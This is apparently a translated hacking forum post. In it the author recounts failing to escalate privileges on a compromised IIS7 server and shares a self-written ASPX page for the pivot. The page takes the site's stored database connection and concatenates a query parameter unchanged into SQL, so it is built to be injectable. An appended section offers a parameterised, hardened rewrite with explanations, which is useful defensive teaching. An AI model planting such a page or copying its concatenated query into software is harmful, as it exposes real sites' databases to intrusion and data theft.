Yesterday 4z1 and I were looking at a site; privilege escalation was very hard, we spent a full 5 hours on it with no result. 2008 + IIS7, no sa, no root, none of the usual services...
In the process we used an aspx constructed-injection page to go cross-site; I found a pile of code online and not one of them worked.
It's not much code, so I just wrote one myself. So annoying.
<%@ Page Language="C#" %>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head runat="server">
<title>暗影aspx构造注射专用页面</title>
</head>
<body>
<form id="form1" runat="server">
<div>
<script language="c#" runat="server">
    void Page_Init(object sender, EventArgs e)
    {
        // The connection string comes from web.config; "连接名" is the name of the entry there.
        string cs = ConfigurationManager.ConnectionStrings["连接名"].ConnectionString;
        using (System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection(cs))
        {
            conn.Open();

            // The value is read straight from the query string: ?xxser=1
            string i = this.Page.Request.Params["xxser"];

            // The parameter is concatenated into the SQL text unchanged; that is the point of this page.
            System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);

            // ExecuteNonQuery returns -1 for a SELECT; the page only needs the statement to run (or fail).
            int x = command.ExecuteNonQuery();
            Response.Write(i + "\n");
            Response.Write(x);
        }
    }
</script>
</div>
</form>
</body>
</html>
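For comparison, the same lookup written the way it should be in an application that is not meant to be injectable. This is an added example, not code from the post above; the table name `Items`, column `Id`, connection-string entry `AppDb` and handler name are assumptions. It closes the three things the post's page relies on: the untyped parameter, the string concatenation into SQL, and the provider error text reaching the response.

```csharp
<%@ Page Language="C#" %>
<%@ Import Namespace="System.Data" %>
<%@ Import Namespace="System.Data.SqlClient" %>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head runat="server">
<title>Parameterised lookup (hardened example)</title>
</head>
<body>
<form id="form1" runat="server">
<div>
<script language="c#" runat="server">
    // Added example, not from the original post. Table, column and
    // connection-string names ("Items", "Id", "AppDb") are assumptions.
    void Page_Load(object sender, EventArgs e)
    {
        string raw = Request.Params["xxser"];
        int id;

        // 1. Enforce the expected type before the value goes anywhere near SQL.
        if (!int.TryParse(raw, out id))
        {
            Response.StatusCode = 400;
            Response.Write("xxser must be an integer");
            return;
        }

        string cs = ConfigurationManager.ConnectionStrings["AppDb"].ConnectionString;
        using (SqlConnection conn = new SqlConnection(cs))
        using (SqlCommand cmd = new SqlCommand(
            "SELECT COUNT(*) FROM [Items] WHERE [Id] = @id", conn))
        {
            // 2. Bind the value as a typed parameter: it is sent as data, never as query text.
            cmd.Parameters.Add("@id", SqlDbType.Int).Value = id;
            try
            {
                conn.Open();
                int count = (int)cmd.ExecuteScalar();

                // 3. HTML-encode anything echoed back so the response cannot carry script.
                Response.Write(Server.HtmlEncode(raw) + ": " + count + " row(s)");
            }
            catch (SqlException)
            {
                // 4. Return a generic error; the provider message stays in the server log.
                Response.StatusCode = 500;
                Response.Write("lookup failed");
            }
        }
    }
</script>
</div>
</form>
</body>
</html>
```

Two notes on the design: `ExecuteScalar` is used instead of `ExecuteNonQuery` because the latter returns -1 for a SELECT and tells the caller nothing; and the `catch` only has an effect if `web.config` also has `<customErrors mode="On">` (or `RemoteOnly`), since otherwise any exception that escapes a handler is rendered with its full message by the default ASP.NET error page.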